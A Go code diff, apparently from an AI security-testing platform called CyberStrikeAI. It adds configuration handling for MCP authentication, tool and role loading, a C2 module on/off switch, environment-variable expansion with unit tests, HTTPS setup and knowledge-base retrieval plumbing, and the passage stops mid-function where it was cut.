+ } + if trimmed == "" || strings.HasPrefix(trimmed, "#") { + continue + } + leadingSpaces := len(line) - len(strings.TrimLeft(line, " ")) + if leadingSpaces <= mcpIndent { + inMcpBlock = false + mcpIndent = -1 + if strings.HasPrefix(trimmed, "mcp:") { + inMcpBlock = true + mcpIndent = leadingSpaces + } + continue + } + + prefix := line[:leadingSpaces] + rest := strings.TrimSpace(line[leadingSpaces:]) + comment := "" + if idx := strings.Index(line, "#"); idx >= 0 { + comment = strings.TrimRight(line[idx:], " ") + } + withComment := "" + if comment != "" { + if !strings.HasPrefix(comment, " ") { + withComment = " " + } + withComment += comment + } + + if strings.HasPrefix(rest, "auth_header_value:") { + lines[i] = fmt.Sprintf("%sauth_header_value: %q%s", prefix, mcp.AuthHeaderValue, withComment) + } else if strings.HasPrefix(rest, "auth_header:") { + lines[i] = fmt.Sprintf("%sauth_header: %q%s", prefix, mcp.AuthHeader, withComment) + } + } + + return os.WriteFile(path, []byte(strings.Join(lines, "\n")), 0644) +} + +// EnsureMCPAuth 在 MCP 启用且 auth_header_value 为空时,自动生成随机密钥并写回配置 +func EnsureMCPAuth(path string, cfg *Config) error { + if !cfg.MCP.Enabled || strings.TrimSpace(cfg.MCP.AuthHeaderValue) != "" { + return nil + } + token, err := generateRandomToken() + if err != nil { + return fmt.Errorf("生成 MCP 鉴权密钥失败: %w", err) + } + cfg.MCP.AuthHeaderValue = token + if strings.TrimSpace(cfg.MCP.AuthHeader) == "" { + cfg.MCP.AuthHeader = "X-MCP-Token" + } + return persistMCPAuth(path, &cfg.MCP) +} + +// PrintMCPConfigJSON 向终端输出 MCP 配置的 JSON,可直接复制到 Cursor / Claude Code 的 mcp 配置中使用 +func PrintMCPConfigJSON(mcp MCPConfig) { + if !mcp.Enabled { + return + } + hostForURL := strings.TrimSpace(mcp.Host) + if hostForURL == "" || hostForURL == "0.0.0.0" { + hostForURL = "localhost" + } + url := fmt.Sprintf("http://%s:%d/mcp", hostForURL, mcp.Port) + headers := map[string]string{} + if mcp.AuthHeader != "" { + headers[mcp.AuthHeader] = mcp.AuthHeaderValue + } + serverEntry := map[string]interface{}{ + "url": url, + } + if len(headers) > 0 { + serverEntry["headers"] = headers + } + // Claude Code 需要 type: "http" + serverEntry["type"] = "http" + out := map[string]interface{}{ + "mcpServers": map[string]interface{}{ + "cyberstrike-ai": serverEntry, + }, + } + b, _ := json.MarshalIndent(out, "", " ") + fmt.Println("[CyberStrikeAI] MCP 配置(可复制到 Cursor / Claude Code 使用):") + fmt.Println(" Cursor: 放入 ~/.cursor/mcp.json 的 mcpServers,或项目 .cursor/mcp.json") + fmt.Println(" Claude Code: 放入 .mcp.json 或 ~/.claude.json 的 mcpServers") + fmt.Println("----------------------------------------------------------------") + fmt.Println(string(b)) + fmt.Println("----------------------------------------------------------------") +} + +// LoadToolsFromDir 从目录加载所有工具配置文件 +func LoadToolsFromDir(dir string) ([]ToolConfig, error) { + var tools []ToolConfig + + // 检查目录是否存在 + if _, err := os.Stat(dir); os.IsNotExist(err) { + return tools, nil // 目录不存在时返回空列表,不报错 + } + + // 读取目录中的所有 .yaml 和 .yml 文件 + entries, err := os.ReadDir(dir) + if err != nil { + return nil, fmt.Errorf("读取工具目录失败: %w", err) + } + + for _, entry := range entries { + if entry.IsDir() { + continue + } + + name := entry.Name() + if !strings.HasSuffix(name, ".yaml") && !strings.HasSuffix(name, ".yml") { + continue + } + + filePath := filepath.Join(dir, name) + tool, err := LoadToolFromFile(filePath) + if err != nil { + // 记录错误但继续加载其他文件 + fmt.Printf("警告: 加载工具配置文件 %s 失败: %v\n", filePath, err) + continue + } + + tools = append(tools, *tool) + } + + return tools, nil +} + +// LoadToolFromFile 从单个文件加载工具配置 +func LoadToolFromFile(path string) (*ToolConfig, error) { + data, err := os.ReadFile(path) + if err != nil { + return nil, fmt.Errorf("读取文件失败: %w", err) + } + + var tool ToolConfig + if err := yaml.Unmarshal(data, &tool); err != nil { + return nil, fmt.Errorf("解析工具配置失败: %w", err) + } + + // 验证必需字段 + if tool.Name == "" { + return nil, fmt.Errorf("工具名称不能为空") + } + if tool.Command == "" { + return nil, fmt.Errorf("工具命令不能为空") + } + + return &tool, nil +} + +// LoadRolesFromDir 从目录加载所有角色配置文件 +func LoadRolesFromDir(dir string) (map[string]RoleConfig, error) { + roles := make(map[string]RoleConfig) + + // 检查目录是否存在 + if _, err := os.Stat(dir); os.IsNotExist(err) { + return roles, nil // 目录不存在时返回空map,不报错 + } + + // 读取目录中的所有 .yaml 和 .yml 文件 + entries, err := os.ReadDir(dir) + if err != nil { + return nil, fmt.Errorf("读取角色目录失败: %w", err) + } + + for _, entry := range entries { + if entry.IsDir() { + continue + } + + name := entry.Name() + if !strings.HasSuffix(name, ".yaml") && !strings.HasSuffix(name, ".yml") { + continue + } + + filePath := filepath.Join(dir, name) + role, err := LoadRoleFromFile(filePath) + if err != nil { + // 记录错误但继续加载其他文件 + fmt.Printf("警告: 加载角色配置文件 %s 失败: %v\n", filePath, err) + continue + } + + // 使用角色名称作为key + roleName := role.Name + if roleName == "" { + // 如果角色名称为空,使用文件名(去掉扩展名)作为名称 + roleName = strings.TrimSuffix(strings.TrimSuffix(name, ".yaml"), ".yml") + role.Name = roleName + } + + roles[roleName] = *role + } + + return roles, nil +} + +// LoadRoleFromFile 从单个文件加载角色配置 +func LoadRoleFromFile(path string) (*RoleConfig, error) { + data, err := os.ReadFile(path) + if err != nil { + return nil, fmt.Errorf("读取文件失败: %w", err) + } + + var role RoleConfig + if err := yaml.Unmarshal(data, &role); err != nil { + return nil, fmt.Errorf("解析角色配置失败: %w", err) + } + + // 处理 icon 字段:如果包含 Unicode 转义格式(\U0001F3C6),转换为实际的 Unicode 字符 + // Go 的 yaml 库可能不会自动解析 \U 转义序列,需要手动转换 + if role.Icon != "" { + icon := role.Icon + // 去除可能的引号 + icon = strings.Trim(icon, `"`) + + // 检查是否是 Unicode 转义格式 \U0001F3C6(8位十六进制)或 \uXXXX(4位十六进制) + if len(icon) >= 3 && icon[0] == '\\' { + if icon[1] == 'U' && len(icon) >= 10 { + // \U0001F3C6 格式(8位十六进制) + if codePoint, err := strconv.ParseInt(icon[2:10], 16, 32); err == nil { + role.Icon = string(rune(codePoint)) + } + } else if icon[1] == 'u' && len(icon) >= 6 { + // \uXXXX 格式(4位十六进制) + if codePoint, err := strconv.ParseInt(icon[2:6], 16, 32); err == nil { + role.Icon = string(rune(codePoint)) + } + } + } + } + + // 验证必需字段 + if role.Name == "" { + // 如果名称为空,尝试从文件名获取 + baseName := filepath.Base(path) + role.Name = strings.TrimSuffix(strings.TrimSuffix(baseName, ".yaml"), ".yml") + } + + return &role, nil +} + +func Default() *Config { + strictRobotIdentity := true + return &Config{ + Server: ServerConfig{ + Host: "0.0.0.0", + Port: 8080, + }, + Log: LogConfig{ + Level: "info", + Output: "stdout", + }, + MCP: MCPConfig{ + Enabled: true, + Host: "0.0.0.0", + Port: 8081, + }, + OpenAI: OpenAIConfig{ + BaseURL: "https://api.openai.com/v1", + Model: "gpt-4", + MaxTotalTokens: 120000, + }, + Agent: AgentConfig{ + MaxIterations: 30, // 默认最大迭代次数 + ToolTimeoutMinutes: 10, // 单次工具执行默认最多 10 分钟,避免异常长时间占用 + }, + Security: SecurityConfig{ + Tools: []ToolConfig{}, // 工具配置应该从 config.yaml 或 tools/ 目录加载 + ToolsDir: "tools", // 默认工具目录 + }, + Database: DatabaseConfig{ + Path: "data/conversations.db", + KnowledgeDBPath: "data/knowledge.db", // 默认知识库数据库路径 + }, + Auth: AuthConfig{ + SessionDurationHours: 12, + }, + Robots: RobotsConfig{ + Session: RobotSessionConfig{ + StrictUserIdentity: &strictRobotIdentity, + }, + }, + Knowledge: KnowledgeConfig{ + Enabled: true, + BasePath: "knowledge_base", + Embedding: EmbeddingConfig{ + Provider: "openai", + Model: "text-embedding-3-small", + BaseURL: "https://api.openai.com/v1", + }, + Retrieval: RetrievalConfig{ + TopK: 5, + SimilarityThreshold: 0.65, // 降低阈值到 0.65,减少漏检 + }, + Indexing: IndexingConfig{ + ChunkStrategy: "markdown_then_recursive", + RequestTimeoutSeconds: 120, + ChunkSize: 768, // 增加到 768,更好的上下文保持 + ChunkOverlap: 50, + MaxChunksPerItem: 20, // 限制单个知识项最多 20 个块,避免消耗过多配额 + BatchSize: 64, + PreferSourceFile: false, + MaxRPM: 100, // 默认 100 RPM,避免 429 错误 + RateLimitDelayMs: 600, // 600ms 间隔,对应 100 RPM + MaxRetries: 3, + RetryDelayMs: 1000, + SubIndexes: nil, + }, + }, + } +} + +// C2Config 内置 C2 模块开关(与知识库 enabled 语义一致:关闭后不初始化监听器、不注册 C2 MCP 工具)。 +type C2Config struct { + // Enabled 为 nil 表示未写配置,按 true 处理(兼容旧 config.yaml) + Enabled *bool `yaml:"enabled,omitempty" json:"enabled,omitempty"` +} + +// EnabledEffective 返回是否启用 C2;未显式配置时默认启用。 +func (c C2Config) EnabledEffective() bool { + if c.Enabled == nil { + return true + } + return *c.Enabled +} + +// C2Public 返回给前端的 C2 状态(仅标量)。 +type C2Public struct { + Enabled bool `json:"enabled"` +} + +// Public 将内部配置转为 API 响应。 +func (c C2Config) Public() C2Public { + return C2Public{Enabled: c.EnabledEffective()} +} + +// C2APIUpdate 设置页/API 更新 C2 开关。 +type C2APIUpdate struct { + Enabled bool `json:"enabled"` +} + +// KnowledgeConfig 知识库配置 +type KnowledgeConfig struct { + Enabled bool `yaml:"enabled" json:"enabled"` // 是否启用知识检索 + BasePath string `yaml:"base_path" json:"base_path"` // 知识库路径 + Embedding EmbeddingConfig `yaml:"embedding" json:"embedding"` + Retrieval RetrievalConfig `yaml:"retrieval" json:"retrieval"` + Indexing IndexingConfig `yaml:"indexing,omitempty" json:"indexing,omitempty"` // 索引构建配置 +} + +// IndexingConfig 索引构建配置(用于控制知识库索引构建时的行为) +type IndexingConfig struct { + // ChunkStrategy: "markdown_then_recursive"(默认,Eino Markdown 标题切分后再递归切)或 "recursive"(仅递归切分) + ChunkStrategy string `yaml:"chunk_strategy,omitempty" json:"chunk_strategy,omitempty"` + // RequestTimeoutSeconds 嵌入 HTTP 客户端超时(秒),0 表示使用默认 120 + RequestTimeoutSeconds int `yaml:"request_timeout_seconds,omitempty" json:"request_timeout_seconds,omitempty"` + // 分块配置 + ChunkSize int `yaml:"chunk_size,omitempty" json:"chunk_size,omitempty"` // 每个块的最大 token 数(估算),默认 512 + ChunkOverlap int `yaml:"chunk_overlap,omitempty" json:"chunk_overlap,omitempty"` // 块之间的重叠 token 数,默认 50 + MaxChunksPerItem int `yaml:"max_chunks_per_item,omitempty" json:"max_chunks_per_item,omitempty"` // 单个知识项的最大块数量,0 表示不限制 + + // PreferSourceFile 为 true 时优先用 Eino FileLoader 从 file_path 读原文再索引(与库内 content 不一致时以磁盘为准) + PreferSourceFile bool `yaml:"prefer_source_file,omitempty" json:"prefer_source_file,omitempty"` + + // 速率限制配置(用于避免 API 速率限制) + RateLimitDelayMs int `yaml:"rate_limit_delay_ms,omitempty" json:"rate_limit_delay_ms,omitempty"` // 请求间隔时间(毫秒),0 表示不使用固定延迟 + MaxRPM int `yaml:"max_rpm,omitempty" json:"max_rpm,omitempty"` // 每分钟最大请求数,0 表示不限制 + + // 重试配置(用于处理临时错误) + MaxRetries int `yaml:"max_retries,omitempty" json:"max_retries,omitempty"` // 最大重试次数,默认 3 + RetryDelayMs int `yaml:"retry_delay_ms,omitempty" json:"retry_delay_ms,omitempty"` // 重试间隔(毫秒),默认 1000 + + // BatchSize 嵌入批大小(SQLite 索引写入),0 表示默认 64 + BatchSize int `yaml:"batch_size,omitempty" json:"batch_size,omitempty"` + // SubIndexes 传入 Eino indexer.WithSubIndexes(逻辑分区标记,随 Document 元数据传递) + SubIndexes []string `yaml:"sub_indexes,omitempty" json:"sub_indexes,omitempty"` +} + +// EmbeddingConfig 嵌入配置 +type EmbeddingConfig struct { + Provider string `yaml:"provider" json:"provider"` // 嵌入模型提供商 + Model string `yaml:"model" json:"model"` // 模型名称 + BaseURL string `yaml:"base_url" json:"base_url"` // API Base URL + APIKey string `yaml:"api_key" json:"api_key"` // API Key(从OpenAI配置继承) +} + +// PostRetrieveConfig 检索后处理:固定对正文做规范化去重(最佳实践)、上下文预算截断;PrefetchTopK 用于多取候选再收敛到 top_k。 +type PostRetrieveConfig struct { + // PrefetchTopK 向量检索阶段最多保留的候选数(余弦序),应 ≥ top_k,0 表示与 top_k 相同;上限见知识库包内常量。 + PrefetchTopK int `yaml:"prefetch_top_k,omitempty" json:"prefetch_top_k,omitempty"` + // MaxContextChars 返回文档内容总 Unicode 字符数上限(整段 chunk,不截断半段);0 表示不限制。 + MaxContextChars int `yaml:"max_context_chars,omitempty" json:"max_context_chars,omitempty"` + // MaxContextTokens 返回文档内容总 token 上限(tiktoken,按嵌入模型名映射,失败则 cl100k_base);0 表示不限制。 + MaxContextTokens int `yaml:"max_context_tokens,omitempty" json:"max_context_tokens,omitempty"` +} + +// RetrievalConfig 检索配置 +type RetrievalConfig struct { + TopK int `yaml:"top_k" json:"top_k"` // 检索Top-K + SimilarityThreshold float64 `yaml:"similarity_threshold" json:"similarity_threshold"` // 余弦相似度阈值 + // SubIndexFilter 非空时仅保留 sub_indexes 含该标签(逗号分隔之一)的行;sub_indexes 为空的旧行仍返回。 + SubIndexFilter string `yaml:"sub_index_filter,omitempty" json:"sub_index_filter,omitempty"` + // PostRetrieve 检索后处理(去重、预算截断);重排通过代码注入 [knowledge.DocumentReranker]。 + PostRetrieve PostRetrieveConfig `yaml:"post_retrieve,omitempty" json:"post_retrieve,omitempty"` +} + +// RolesConfig 角色配置(已废弃,使用 map[string]RoleConfig 替代) +// 保留此类型以兼容旧代码,但建议直接使用 map[string]RoleConfig +type RolesConfig struct { + Roles map[string]RoleConfig `yaml:"roles,omitempty" json:"roles,omitempty"` +} + +// RoleConfig 单个角色配置 +type RoleConfig struct { + Name string `yaml:"name" json:"name"` // 角色名称 + Description string `yaml:"description" json:"description"` // 角色描述 + UserPrompt string `yaml:"user_prompt" json:"user_prompt"` // 用户提示词(追加到用户消息前) + Icon string `yaml:"icon,omitempty" json:"icon,omitempty"` // 角色图标(可选) + Tools []string `yaml:"tools,omitempty" json:"tools,omitempty"` // 关联的工具列表(toolKey格式,如 "toolName" 或 "mcpName::toolName") + MCPs []string `yaml:"mcps,omitempty" json:"mcps,omitempty"` // 向后兼容:关联的MCP服务器列表(已废弃,使用tools替代) + Enabled bool `yaml:"enabled" json:"enabled"` // 是否启用 +} diff --git a/config/envexpand.go b/config/envexpand.go new file mode 100644 index 00000000..0ffc1784 --- /dev/null +++ b/config/envexpand.go @@ -0,0 +1,66 @@ +package config + +import ( + "os" + "strings" +) + +// expandEnvVar 展开字符串中的 ${VAR} 和 ${VAR:-default} 环境变量引用。 +// 与官方 MCP 配置格式一致(Claude Desktop / Cursor / VS Code 均支持此语法)。 +func expandEnvVar(s string) string { + var b strings.Builder + i := 0 + for i < len(s) { + // 查找 ${ + idx := strings.Index(s[i:], "${") + if idx < 0 { + b.WriteString(s[i:]) + break + } + b.WriteString(s[i : i+idx]) + i += idx + 2 // skip ${ + + // 查找对应的 } + end := strings.IndexByte(s[i:], '}') + if end < 0 { + // 没有 },原样保留 + b.WriteString("${") + continue + } + expr := s[i : i+end] + i += end + 1 // skip } + + // 解析 VAR:-default + varName := expr + defaultVal := "" + hasDefault := false + if colonIdx := strings.Index(expr, ":-"); colonIdx >= 0 { + varName = expr[:colonIdx] + defaultVal = expr[colonIdx+2:] + hasDefault = true + } + + val := os.Getenv(varName) + if val == "" && hasDefault { + val = defaultVal + } + b.WriteString(val) + } + return b.String() +} + +// ExpandConfigEnv 展开 ExternalMCPServerConfig 中所有支持环境变量的字段。 +// 展开范围:Command、Args、Env values、URL、Headers values。 +func ExpandConfigEnv(cfg *ExternalMCPServerConfig) { + cfg.Command = expandEnvVar(cfg.Command) + for i, arg := range cfg.Args { + cfg.Args[i] = expandEnvVar(arg) + } + for k, v := range cfg.Env { + cfg.Env[k] = expandEnvVar(v) + } + cfg.URL = expandEnvVar(cfg.URL) + for k, v := range cfg.Headers { + cfg.Headers[k] = expandEnvVar(v) + } +} diff --git a/config/envexpand_test.go b/config/envexpand_test.go new file mode 100644 index 00000000..a17c4514 --- /dev/null +++ b/config/envexpand_test.go @@ -0,0 +1,81 @@ +package config + +import ( + "os" + "testing" +) + +func TestExpandEnvVar(t *testing.T) { + os.Setenv("TEST_MCP_VAR", "hello") + os.Setenv("TEST_MCP_PATH", "/usr/local/bin") + defer os.Unsetenv("TEST_MCP_VAR") + defer os.Unsetenv("TEST_MCP_PATH") + + tests := []struct { + name string + input string + expect string + }{ + {"plain string", "no vars here", "no vars here"}, + {"empty string", "", ""}, + {"simple var", "${TEST_MCP_VAR}", "hello"}, + {"var in middle", "prefix-${TEST_MCP_VAR}-suffix", "prefix-hello-suffix"}, + {"multiple vars", "${TEST_MCP_PATH}/${TEST_MCP_VAR}", "/usr/local/bin/hello"}, + {"missing var empty", "${NONEXISTENT_MCP_VAR_XYZ}", ""}, + {"default value used", "${NONEXISTENT_MCP_VAR_XYZ:-fallback}", "fallback"}, + {"default not used", "${TEST_MCP_VAR:-unused}", "hello"}, + {"default with path", "${NONEXISTENT_MCP_VAR_XYZ:-/tmp/default}", "/tmp/default"}, + {"unclosed brace", "${UNCLOSED", "${UNCLOSED"}, + {"dollar without brace", "$PLAIN", "$PLAIN"}, + {"empty var name", "${}", ""}, + {"default empty var", "${:-default}", "default"}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + got := expandEnvVar(tt.input) + if got != tt.expect { + t.Errorf("expandEnvVar(%q) = %q, want %q", tt.input, got, tt.expect) + } + }) + } +} + +func TestExpandConfigEnv(t *testing.T) { + os.Setenv("TEST_MCP_CMD", "python3") + os.Setenv("TEST_MCP_TOKEN", "secret123") + defer os.Unsetenv("TEST_MCP_CMD") + defer os.Unsetenv("TEST_MCP_TOKEN") + + cfg := &ExternalMCPServerConfig{ + Command: "${TEST_MCP_CMD}", + Args: []string{"--token", "${TEST_MCP_TOKEN}", "${MISSING:-default_arg}"}, + Env: map[string]string{"API_KEY": "${TEST_MCP_TOKEN}", "LEVEL": "${MISSING:-INFO}"}, + URL: "https://${MISSING:-example.com}/mcp", + Headers: map[string]string{"Authorization": "Bearer ${TEST_MCP_TOKEN}"}, + } + + ExpandConfigEnv(cfg) + + if cfg.Command != "python3" { + t.Errorf("Command = %q, want %q", cfg.Command, "python3") + } + if cfg.Args[1] != "secret123" { + t.Errorf("Args[1] = %q, want %q", cfg.Args[1], "secret123") + } + if cfg.Args[2] != "default_arg" { + t.Errorf("Args[2] = %q, want %q", cfg.Args[2], "default_arg") + } + if cfg.Env["API_KEY"] != "secret123" { + t.Errorf("Env[API_KEY] = %q, want %q", cfg.Env["API_KEY"], "secret123") + } + if cfg.Env["LEVEL"] != "INFO" { + t.Errorf("Env[LEVEL] = %q, want %q", cfg.Env["LEVEL"], "INFO") + } + if cfg.URL != "https://example.com/mcp" { + t.Errorf("URL = %q, want %q", cfg.URL, "https://example.com/mcp") + } + if cfg.Headers["Authorization"] != "Bearer secret123" { + t.Errorf("Headers[Authorization] = %q, want %q", cfg.Headers["Authorization"], "Bearer secret123") + } +} diff --git a/config/server_https_bootstrap.go b/config/server_https_bootstrap.go new file mode 100644 index 00000000..80a4e4d2 --- /dev/null +++ b/config/server_https_bootstrap.go @@ -0,0 +1,46 @@ +package config + +import "strings" + +// MainWebUIUsesHTTPS 判断主 Web UI 是否以 HTTPS 监听(与 internal/app.prepareMainServerTLS 前置条件一致)。 +func MainWebUIUsesHTTPS(s *ServerConfig) bool { + if s == nil { + return false + } + if s.TLSEnabled { + return true + } + if s.TLSAutoSelfSign { + return true + } + cert := strings.TrimSpace(s.TLSCertPath) + key := strings.TrimSpace(s.TLSKeyPath) + return cert != "" && key != "" +} + +// ServerHTTPRedirectEnabled 是否在主站启用 HTTPS 时把明文 HTTP 请求重定向到 HTTPS(默认开启)。 +func ServerHTTPRedirectEnabled(s *ServerConfig) bool { + if s == nil || !MainWebUIUsesHTTPS(s) { + return false + } + if s.TLSHTTPRedirect == nil { + return true + } + return *s.TLSHTTPRedirect +} + +// ApplyDevHTTPSBootstrap 供 --https / 一键脚本使用:强制开启主站 TLS。 +// 若已配置 tls_cert_path 与 tls_key_path 则仅用 PEM,不开启自签;否则启用 tls_auto_self_sign(内存证书,仅本地测试)。 +func ApplyDevHTTPSBootstrap(cfg *Config) { + if cfg == nil { + return + } + cfg.Server.TLSEnabled = true + cert := strings.TrimSpace(cfg.Server.TLSCertPath) + key := strings.TrimSpace(cfg.Server.TLSKeyPath) + if cert != "" && key != "" { + cfg.Server.TLSAutoSelfSign = false + return + } + cfg.Server.TLSAutoSelfSign = true +} diff --git a/knowledge/chunk_eino.go b/knowledge/chunk_eino.go new file mode 100644 index 00000000..6592f350 --- /dev/null +++ b/knowledge/chunk_eino.go @@ -0,0 +1,67 @@ +package knowledge + +import ( + "context" + "fmt" + "strings" + + "github.com/cloudwego/eino-ext/components/document/transformer/splitter/markdown" + "github.com/cloudwego/eino-ext/components/document/transformer/splitter/recursive" + "github.com/cloudwego/eino/components/document" + "github.com/pkoukk/tiktoken-go" +) + +func tokenizerLenFunc(embeddingModel string) func(string) int { + fallback := func(s string) int { + r := []rune(s) + if len(r) == 0 { + return 0 + } + return (len(r) + 3) / 4 + } + m := strings.TrimSpace(embeddingModel) + if m == "" { + return fallback + } + tok, err := tiktoken.EncodingForModel(m) + if err != nil { + return fallback + } + return func(s string) int { + return len(tok.Encode(s, nil, nil)) + } +} + +// newKnowledgeSplitter builds an Eino recursive text splitter. LenFunc uses tiktoken for +// embeddingModel when available, else rune/4 approximation. +func newKnowledgeSplitter(chunkSize, overlap int, embeddingModel string) (document.Transformer, error) { + if chunkSize <= 0 { + return nil, fmt.Errorf("chunk size must be positive") + } + if overlap < 0 { + overlap = 0 + } + return recursive.NewSplitter(context.Background(), &recursive.Config{ + ChunkSize: chunkSize, + OverlapSize: overlap, + LenFunc: tokenizerLenFunc(embeddingModel), + Separators: []string{ + "\n\n", "\n## ", "\n### ", "\n#### ", "\n", + "。", "!", "?", ". ", "? ", "! ", + " ", + }, + }) +} + +// newMarkdownHeaderSplitter Eino-ext Markdown 按标题切分(#~####),适合技术/Markdown 知识库。 +func newMarkdownHeaderSplitter(ctx context.Context) (document.Transformer, error) { + return markdown.NewHeaderSplitter(ctx, &markdown.HeaderConfig{ + Headers: map[string]string{ + "#": "h1", + "##": "h2", + "###": "h3", + "####": "h4", + }, + TrimHeaders: false, + }) +} diff --git a/knowledge/eino_meta.go b/knowledge/eino_meta.go new file mode 100644 index 00000000..0ee7c41b --- /dev/null +++ b/knowledge/eino_meta.go @@ -0,0 +1,129 @@ +package knowledge + +import ( + "fmt" + "strings" +) + +// Document metadata keys for Eino schema.Document flowing through the RAG pipeline. +const ( + metaKBCategory = "kb_category" + metaKBTitle = "kb_title" + metaKBItemID = "kb_item_id" + metaKBChunkIndex = "kb_chunk_index" + metaSimilarity = "similarity" +) + +// DSL keys for [VectorEinoRetriever.Retrieve] via [retriever.WithDSLInfo]. +const ( + DSLRiskType = "risk_type" + DSLSimilarityThreshold = "similarity_threshold" + DSLSubIndexFilter = "sub_index_filter" +) + +// FormatEmbeddingInput matches the historical indexing format so existing embeddings +// stay comparable if users skip reindex; new indexes use the same string shape. +func FormatEmbeddingInput(category, title, chunkText string) string { + return fmt.Sprintf("[风险类型:%s] [标题:%s]\n%s", category, title, chunkText) +} + +// FormatQueryEmbeddingText builds the string embedded at query time so it matches +// [FormatEmbeddingInput] for the same risk category (title left empty for queries). +func FormatQueryEmbeddingText(riskType, query string) string { + q := strings.TrimSpace(query) + rt := strings.TrimSpace(riskType) + if rt != "" { + return FormatEmbeddingInput(rt, "", q) + } + return q +} + +// MetaLookupString returns metadata string value or "" if absent. +func MetaLookupString(md map[string]any, key string) string { + if md == nil { + return "" + } + v, ok := md[key] + if !ok || v == nil { + return "" + } + switch t := v.(type) { + case string: + return t + default: + return strings.TrimSpace(fmt.Sprint(t)) + } +} + +// MetaStringOK returns trimmed non-empty string and true if present and non-empty. +func MetaStringOK(md map[string]any, key string) (string, bool) { + s := strings.TrimSpace(MetaLookupString(md, key)) + if s == "" { + return "", false + } + return s, true +} + +// RequireMetaString requires a non-empty string metadata field. +func RequireMetaString(md map[string]any, key string) (string, error) { + s, ok := MetaStringOK(md, key) + if !ok { + return "", fmt.Errorf("missing or empty metadata %q", key) + } + return s, nil +} + +// RequireMetaInt requires an integer metadata field. +func RequireMetaInt(md map[string]any, key string) (int, error) { + if md == nil { + return 0, fmt.Errorf("missing metadata key %q", key) + } + v, ok := md[key] + if !ok { + return 0, fmt.Errorf("missing metadata key %q", key) + } + switch t := v.(type) { + case int: + return t, nil + case int32: + return int(t), nil + case int64: + return int(t), nil + case float64: + return int(t), nil + default: + return 0, fmt.Errorf("metadata %q: unsupported type %T", key, v) + } +} + +// DSLNumeric coerces DSL map values (e.g. from JSON) to float64. +func DSLNumeric(v any) (float64, bool) { + switch t := v.(type) { + case float64: + return t, true + case float32: + return float64(t), true + case int: + return float64(t), true + case int64: + return float64(t), true + case uint32: + return float64(t), true + case uint64: + return float64(t), true + default: + return 0, false + } +} + +// MetaFloat64OK reads a float metadata value. +func MetaFloat64OK(md map[string]any, key string) (float64, bool) { + if md == nil { + return 0, false + } + v, ok := md[key] + if !ok { + return 0, false + } + return DSLNumeric(v) +} diff --git a/knowledge/eino_meta_test.go b/knowledge/eino_meta_test.go new file mode 100644 index 00000000..ba3f60da --- /dev/null +++ b/knowledge/eino_meta_test.go @@ -0,0 +1,14 @@ +package knowledge + +import "testing" + +func TestFormatQueryEmbeddingText_AlignsWithIndexPrefix(t *testing.T) { + q := FormatQueryEmbeddingText("XSS", "payload") + want := FormatEmbeddingInput("XSS", "", "payload") + if q != want { + t.Fatalf("query embed text mismatch:\n got: %q\nwant: %q", q, want) + } + if FormatQueryEmbeddingText("", "hello") != "hello" { + t.Fatalf("expected bare query without risk type") + } +} diff --git a/knowledge/eino_retrieve_chain.go b/knowledge/eino_retrieve_chain.go new file mode 100644 index 00000000..2d1b72eb --- /dev/null +++ b/knowledge/eino_retrieve_chain.go @@ -0,0 +1,25 @@ +package knowledge + +import ( + "context" + "fmt" + + "github.com/cloudwego/eino/compose" + "github.com/cloudwego/eino/schema" +) + +// BuildKnowledgeRetrieveChain 编译「查询字符串 → 文档列表」的 Eino Chain,底层为 SQLite 向量检索([VectorEinoRetriever])。 +// 去重、上下文预算截断与最终 Top-K 均在 [VectorEinoRetriever.Retrieve] 内完成,与 HTTP/MCP 检索路径一致。 +func BuildKnowledgeRetrieveChain(ctx context.Context, r *Retriever) (compose.Runnable[string, []*schema.Document], error) { + if r == nil { + return nil, fmt.Errorf("retriever is nil") + } + ch := compose.NewChain[string, []*schema.Document]() + ch.AppendRetriever(r.AsEinoRetriever()) + return ch.Compile(ctx) +} + +// CompileRetrieveChain 等价于 [BuildKnowledgeRetrieveChain](ctx, r)。 +func (r *Retriever) CompileRetrieveChain(ctx context.Context) (compose.Runnable[string, []*schema.Document], error) { + return BuildKnowledgeRetrieveChain(ctx, r) +} diff --git a/knowledge/eino_retrieve_chain_test.go b/knowledge/eino_retrieve_chain_test.go new file mode 100644 index 00000000..c74a6900 --- /dev/null +++ b/knowledge/eino_retrieve_chain_test.go @@ -0,0 +1,23 @@ +package knowledge + +import ( + "context" + "testing" + + "go.uber.org/zap" +) + +func TestBuildKnowledgeRetrieveChain_Compile(t *testing.T) { + r := NewRetriever(nil, nil, &RetrievalConfig{TopK: 3, SimilarityThreshold: 0.5}, zap.NewNop()) + _, err := BuildKnowledgeRetrieveChain(context.Background(), r) + if err != nil { + t.Fatal(err) + } +} + +func TestBuildKnowledgeRetrieveChain_NilRetriever(t *testing.T) { + _, err := BuildKnowledgeRetrieveChain(context.Background(), nil) + if err == nil { + t.Fatal("expected error for nil retriever") + } +} diff --git a/knowledge/eino_retriever_adapter.go b/knowledge/eino_retriever_adapter.go new file mode 100644 index 00000000..f5635121 --- /dev/null +++ b/knowledge/eino_retriever_adapter.go @@ -0,0 +1,202 @@ +package knowledge + +import ( + "context" + "fmt" + "strings" + + "cyberstrike-ai/internal/config" + + "github.com/cloudwego/eino/callbacks" + "github.com/cloudwego/eino/components" + "github.com/cloudwego/eino/components/retriever" + "github.com/cloudwego/eino/schema" + "go.uber.org/zap" +) + +// VectorEinoRetriever implements [retriever.Retriever] on top of SQLite-stored embeddings + cosine similarity. +// +// Options: +// - [retriever.WithTopK] +// - [retriever.WithDSLInfo] with [DSLRiskType] (string), [DSLSimilarityThreshold] (float, cosine 0–1), [DSLSubIndexFilter] (string) +// +// Document scores are cosine similarity; [retriever.WithScoreThreshold] is not mapped to a different metric. +// +// After vector search: optional [DocumentReranker] (see [Retriever.SetDocumentReranker]), then +// [ApplyPostRetrieve] (normalized-text dedupe, context budget, final Top-K) using [config.PostRetrieveConfig]. +type VectorEinoRetriever struct { + inner *Retriever +} + +// NewVectorEinoRetriever wraps r for Eino compose / tooling. +func NewVectorEinoRetriever(r *Retriever) *VectorEinoRetriever { + if r == nil { + return nil + } + return &VectorEinoRetriever{inner: r} +} + +// GetType identifies this retriever for Eino callbacks. +func (h *VectorEinoRetriever) GetType() string { + return "SQLiteVectorKnowledgeRetriever" +} + +// Retrieve runs vector search and returns [schema.Document] rows. +func (h *VectorEinoRetriever) Retrieve(ctx context.Context, query string, opts ...retriever.Option) (out []*schema.Document, err error) { + if h == nil || h.inner == nil { + return nil, fmt.Errorf("VectorEinoRetriever: nil retriever") + } + q := 